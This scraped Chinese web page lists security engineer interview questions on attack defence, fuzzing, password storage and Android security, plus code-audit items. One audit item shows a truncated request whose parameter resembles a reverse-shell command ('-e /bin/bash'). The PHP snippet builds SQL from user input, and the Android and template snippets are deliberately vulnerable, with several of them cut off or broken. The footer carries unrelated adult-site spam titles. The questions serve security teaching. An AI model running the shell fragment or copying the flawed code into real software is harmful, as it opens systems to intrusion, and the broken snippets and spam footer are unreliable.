安全工程師簡答題

          時間:2021-04-06 16:17:01 試題 我要投稿

          安全工程師簡答題

            簡答題:

            請列舉防御CC攻擊的方法

            審計這條web請求,說說你的看法

            http://www.hack.cn/hack.php?cmd= ... 80-e/bin/bash 200

            你發現110.2.3.4正在暴力破解你所管理的服務器,你應該如何處理?

            硬件斷點和軟件點有什么不同?

            從網絡流量上監測到一臺Linux機器連接著一臺木馬控制端,在這臺機器上僅使用系統自帶的命令,如何定位出哪個是進程連接的?

            如果你設計一個賬號系統,為保障密碼的安全,你會如何設計存儲密碼?

            非對稱的加密算法可以用來加密,也可以用于簽名,請說明什么場景下用來加密,什么情景下用來簽名?

            ContentProvider是Android上負責提供數據讀寫的組件,應用內部或者應用之間的數據共享與存儲都會使用 ContentProvider組件。 但在實際使用過程中,很容易出現各種安全問題,請結合你實踐,描述一下在使用ContentProvider時,所需要注意的事項。

            現有一套針對某個jpg文件庫的`fuzz環境,每秒鐘可以執行上千次fuzz實例,產生的crash很多,每次crash都有對應的crash dump,請說如初步何篩選出有價值的crash,如何確定某個特定的crash對應的fuzz實例,以及如何確定一個crash是否是安全漏洞(假設我 們只關心緩沖區溢出漏洞)。

            gcc編譯器支持的__attribute__ ((constructor))特性得以實現的底層機制跟ELF結構的哪個部分有關系?這個部分在現實中哪些地方可以用到?

            代碼審計:

            淘寶首頁以下代碼片段是否可能存在安全漏洞?如果有,請指出來并提供修復建議;如果沒有,說明你判斷的理由

            #set($url = $!request.getParameter('url'))

            以下程序是否存在安全漏洞?如果有,請指出來并提供修復建議

            交易狀態:

            以下程序是否存在安全漏洞?如果有,請指出來并提供修復建議。

            $id=$_GET['id'];

            $getacct = mysql_query("select * from orders where id='$id' and client id='$fnm->clientid") or dir(mysql_error());

            while ($row = mysql_fetch_array($getacct))

            {

            acctid = $row["id"];

            ?>

            Cpanel User:

            }

            ?>

            在Linux系統中,我們通常使用終端shell腳本處理一些數據,十分高效便捷。

            現在有以下兩個文件:

            File1:

            user passwd

            Hoecker animal

            Newbee 238H76N3

            Buttes Paradis1

            TRON995 fdcmdgeo

            G60FgL LgEl9H

            ozron44 oriole62

            File2:

            id user

            001 Yosh405

            002 Newbee

            003 G60FgL

            004 Hoecker

            005 sudhakar0303

            要求:

            編寫一段shell腳本,輸出同時存在于File1和File2中用戶名的密碼。(可使用管道命令,只輸出密碼)

            以下是一段導出Activity的onCreate和onNewIntent函數中的代碼,請找出其中的所有漏洞并說明可能產生的危害:

            其中:alibaba.test.sender是同樣由淘寶開發的另一個應用程序的package name。

            此Activity對應的manifest文件中的定義:

            protected void onCreate(Bundle savedInstanceState) {

            super.onCreate(savedInstanceState);

            String calling_package= getCallingPackage();

            if (!calling_package.equals("alibaba.test.sender")){

            return;

            }

            }

            protected void onNewIntent (Intent intent){

            super.onNewIntent(intent);

            Intent intent = getIntent();

            Intent rec_intent;

            rec_intent=intent.getParcelableExtra("log_intent");

            Date date = new Date();

            rec_intent.putExtra("timestamp",date.getTime());

            rec_intent.putExtra("EVENT_TYPE","activity_launched");

            rec_intent.setAction("LOG_ACTION");

            sendBroadcast(rec_intent, "TAOBAO_BROADCAST_RECEIVER");

            }

          【安全工程師簡答題】相關文章:

          《教育知識與能力》簡答題01-17

          安全工程師報考條件03-31

          教師資格考試簡答題答題技巧04-03

          沖壓工程師簡歷03-18

          售前工程師簡歷03-12

          品質工程師簡歷03-12

          模具工程師簡歷03-10

          QE工程師簡歷03-09

          ios工程師簡歷03-04

          工程師介紹信12-31

          国产精品好爽好紧好大_亚洲男人综合久久综合_欧美福利电影a在线播放www_国产精品99久久精品无码

                  亚洲人成网站观看在线播放 | 亚洲人成影院在线观看 | 中文字幕激情欧美 | 亚洲嫩模久久精品 | 亚洲国产精品99页 | 精品国产高清一区二区三区 |